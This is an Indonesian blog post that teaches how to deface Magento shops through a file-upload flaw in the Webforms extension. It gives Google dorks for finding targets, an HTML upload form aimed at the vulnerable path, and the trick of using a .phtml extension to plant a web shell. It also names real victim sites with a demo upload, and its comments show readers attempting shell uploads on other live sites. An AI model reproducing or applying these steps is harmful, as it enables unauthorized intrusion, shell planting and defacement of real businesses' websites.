Header Ads

Deface Menggunakan Magento Webforms File Upload Vulnerabilty


Kali ini gua mau Repost Artikel gua Teknik Deface Menggunakan Magento Webforms File Upload Vulnerabilty
Artikel dulu : Disini

Google Dork :

- inurl:/webforms/index/index intext:2016
- inurl:/webforms/index/index/ intext:beauty intitle:shop dll

 (kembangkan)

atau kalian bisa pakai Dork Magento Add Admin

Dork Magento Lengkap

CSRF:

kalian bisa pakai CSRF Online di Sini

http://www.makarizo.com/coco.php

atau pakai CSRF sendiri

<form method="POST" action="https://site.Target.com/js/webforms/upload/index.php" enctype="multipart/form-data"> <input type="file" name="files[]" /><button>Upload</button> </form>

Kalau pake CSRF Online  ini POST File dengan : files[]

Exploit :

www.site.com/path//js/webforms/upload/index.php

Vulnerabilty : []

Contoh site vuln

https://shop.destrooper.com/js/webforms/upload/index.php

Step By Step :

1. Masukan Target , dan PostFile. kalau sudah klik Kunci Target


 2. Upload File kamu. Bisa di upload shell juga ko tapi ext Shell nya harus .phtml, soalnya kalo .php itu malah mental

kalau sudah , klik Upload





 3. Nanti akan muncul angka random
 
 4. Tetak Shell atau File kita

www.site.com/[path]/js/webforms/upload/files/[angka random]/file kita.txt etc


Demo :

https://shop.destrooper.com/js/webforms/upload/files/2zzb4/404.txt 


Mau Copas ? tolong sertakan sumber :) gua cape ngetik nya :)

6 comments:

  1. [{"name":"ICS.phtml","size":false,"type":"application\/octet-stream","rand":"mb09z","error":"abort","delete_url":"http:\/\/recambios.eurofred.es\/js\/webforms\/upload\/?file=ICS.phtml","delete_type":"DELETE"}]

    kalo gtu gmn bgkuh ?
    ane kgak bsa akses ke shell ?

    ReplyDelete
    Replies
    1. oke mkasi bgkuh , ane usaha lagi semangat 45 ^_^
      sring'' update cara deface iya bgkuh ;;)
      ane pngunjung setia blog ente :*

      Delete
    2. iya ka :D trims sudah berkunjung ke blog kami ^_^

      Delete
  2. kenapa kalau upload file .txt bisa ke baca ya gan, tapi klo .phtml kok gak kebaca nich...

    ReplyDelete

Silahkan Komentar dengan bahasa yang sopan

Powered by Blogger.